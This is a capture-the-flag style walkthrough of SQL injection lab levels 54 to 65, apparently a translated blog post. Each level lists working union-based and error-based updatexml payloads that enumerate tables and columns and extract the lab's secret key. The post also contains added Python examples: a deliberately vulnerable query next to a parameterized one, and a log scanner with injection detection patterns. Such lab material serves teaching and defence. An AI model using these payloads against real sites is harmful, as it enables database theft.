sql-lab (54-65)

2022-07-07 12:24:00 hcjtn

(54~60)

sql-lab-54

From level 54 onward, the levels get harder.

Level 54 only lets us submit ten statements. After ten, the lab refreshes all the database names, table names and column names. So from this level on, all statements are for reference only.

Step one: determine the closing method:

?id=1' and 1=2 -- q

The page reports an error, so the closing method is a single quote.

Step two: check whether any keywords are filtered.

Step three: decide how to construct the injection statement.

  • The page echoes query output, so use a union query

    ?id=-1' union select 1,2,database() -- q

The database name is: challenges

?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema='challenges' limit 0,1-- q

The table name is: ufka71dqts

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='ufka71dqts'-- q

The column names are: id,sessid,secret_JZU6,tryy

?id=-1' union select 1,secret_JZU6,3 from ufka71dqts -- q

The query succeeds. Submit the query result in: Submit Secret Key

This level is solved!

sql-lab-55

Determine the closing method: ?id=1)and 1=1-- q

The closing method turns out to be a parenthesis.

Decide how to construct the injection statement.

  • The page echoes query output, so use a union query

    ?id=-1)union select 1,2,database() -- q

The database name is: challenges

?id=-1)union select 1,table_name,3 from information_schema.tables where table_schema='challenges' limit 0,1-- q

The table name is: qbj8tdrlxb

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='qbj8tdrlxb'-- q

The column names are: id,sessid,secret_N7EM,tryy

?id=-1)union select 1,secret_N7EM,3 from qbj8tdrlxb -- q

The query succeeds. Submit the query result in: Submit Secret Key

This level is solved!

sql-lab-56

Determine the closing method: ?id=1')and 1=1-- q

Decide how to construct the injection statement.

  • The page echoes query output, so use a union query

    ?id=-1') union select 1,2,database() -- q

The database name is: challenges

?id=-1')union select 1,table_name,3 from information_schema.tables where table_schema='challenges' limit 0,1-- q

The table name is: okzcd5g9co

?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='okzcd5g9co'-- q

The column names are: id,sessid,secret_W8S8,tryy

?id=-1')union select 1,secret_W8S8,3 from okzcd5g9co -- q

The query succeeds. Submit the query result in: Submit Secret Key

This level is solved!


sql-lab-57

This level is the same as the previous one except for the closing method.

Determine the closing method: ?id=1"and 1=1-- q
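The closing method only matters because the lab concatenates the id into the SQL text. The following is an added example, not part of the original post or of the lab's code: it replays the page's union pattern for the closures of levels 54 to 56 against a constructed SQLite database, next to a parameterized lookup. The table names, the secret value and the function names are assumptions, and the double-quote closure of level 57 is left out because SQLite treats double quotes differently from MySQL.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab: a users table and a table holding a secret."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb');
        CREATE TABLE secrets (secret TEXT);
        INSERT INTO secrets VALUES ('CONSTRUCTED-SECRET');
    """)
    return db

# (text before the input, text after it) for the closures of levels 54, 55 and 56.
CLOSURES = {"54": ("'", "'"), "55": ("(", ")"), "56": ("('", "')")}

def vulnerable_lookup(db, level, user_id):
    """Concatenates the input into the SQL text, so the closure can be broken out of."""
    before, after = CLOSURES[level]
    sql = f"SELECT * FROM users WHERE id={before}{user_id}{after} LIMIT 0,1"
    return db.execute(sql).fetchall()

def hardened_lookup(db, user_id):
    """Binds the input as a parameter; it never becomes part of the SQL text."""
    sql = "SELECT * FROM users WHERE id = ? LIMIT 0,1"
    return db.execute(sql, (user_id,)).fetchall()

def walkthrough_payload(level):
    """The page's union pattern, pointed at the constructed secrets table."""
    return f"-1{CLOSURES[level][1]} union select 1,secret,3 from secrets-- q"

def compare(db):
    """Per level: (rows returned by concatenation, rows returned with binding)."""
    return {lvl: (vulnerable_lookup(db, lvl, walkthrough_payload(lvl)),
                  hardened_lookup(db, walkthrough_payload(lvl)))
            for lvl in CLOSURES}

if __name__ == "__main__":
    for lvl, (leaked, bound) in compare(make_db()).items():
        print(lvl, "concatenated:", leaked, "| bound:", bound)
```

With binding, the same lookup serves every level: there is no closure left to guess, and the whole payload is compared to the id column as a single value.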


sql-lab-58

First, determine the closing method: ?id=1' and 1=1 -- q

The union query turns out not to work here, so we use error-based injection.

?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

The database name is: challenges

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

The table name is: 20lvmztx1r

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='20lvmztx1r' limit 0,1),0x7e),1)-- q

The column names are: id,sessid,secret_X8WY,tryy

?id=1' and updatexml(1,concat(0x7e,(select secret_X8WY from 20lvmztx1r limit 0,1),0x7e),1)-- q

The query succeeds.

This level is solved!


sql-lab-59

?id=1 and 1=2-- q

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fjwx950mdd' limit 0,1),0x7e),1)-- q

?id=1 and updatexml(1,concat(0x7e,(select secret_Z2BD from fjwx950mdd limit 0,1),0x7e),1)-- q


sql-lab-60

?id=1")and 1=2-- q

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1") and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='hmguhc8wji' limit 0,1),0x7e),1)-- q

?id=1") and updatexml(1,concat(0x7e,(select secret_0LPA from hmguhc8wji limit 0,1),0x7e),1)-- q


(61~65)

sql-lab-61

?id=1'))and 1=1-- q

?id=1')) and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1')) and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qd5l9mppz3' limit 0,1),0x7e),1)-- q

?id=1')) and updatexml(1,concat(0x7e,(select secret_ZHCO from qd5l9mppz3 limit 0,1),0x7e),1)-- q
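Seen from the defending side, the statements in levels 54 to 61 share a handful of shapes: a boolean probe to find the closure, union select, information_schema enumeration, updatexml() and a trailing comment. The following is an added example, not part of the original post: it URL-decodes the query string of access-log lines and flags parameters matching those shapes. The log format, the sample lines, the rule names and the function name are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the payload shapes used in this walkthrough.
RULES = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "error_based_xml": re.compile(r"\bupdatexml\s*\(", re.I),
    "trailing_comment": re.compile(r"--\s+\w*\s*$"),
}
LOG_LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" \d{3}$')

# Constructed sample log lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
    '198.51.100.4 "GET /Less-54/?id=1 HTTP/1.1" 200',
    '198.51.100.9 "GET /Less-54/?id=-1%27%20union%20select%201,2,database()%20--%20q HTTP/1.1" 200',
    '198.51.100.9 "GET /Less-58/?id=1%27%20and%20updatexml(1,concat(0x7e,'
    '(select%20table_name%20from%20information_schema.tables%20limit%200,1),0x7e),1)--%20q HTTP/1.1" 200',
    '198.51.100.4 "GET /search?q=student+union+election HTTP/1.1" 200',
    '198.51.100.9 "GET /Less-56/?id=1%27)and%201=1--%20q HTTP/1.1" 200',
]

def scan(lines):
    """Return (client, path, parameter, matched rule names) for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the constructed log format
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes values, so %27 and %20 are matched as ' and space.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = sorted(rule for rule, rx in RULES.items() if rx.search(value))
            if hits:
                findings.append((client, parts.path, name, hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The plain id=1 request and the search for "student union election" are not flagged, because the rules match statement structure rather than single keywords.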


sql-lab-62~65

In these levels, neither union queries nor error-based injection can be used.

First determine the closing method:

?id=1')and 1=1-- q

Then use blind injection.

It is recommended to write a blind injection script.

That concludes sql-lab.

Copyright notice
This article was written by [hcjtn]. Please include the original link when reposting. Thanks.
https://yzsam.com/2022/02/202202130618271338.html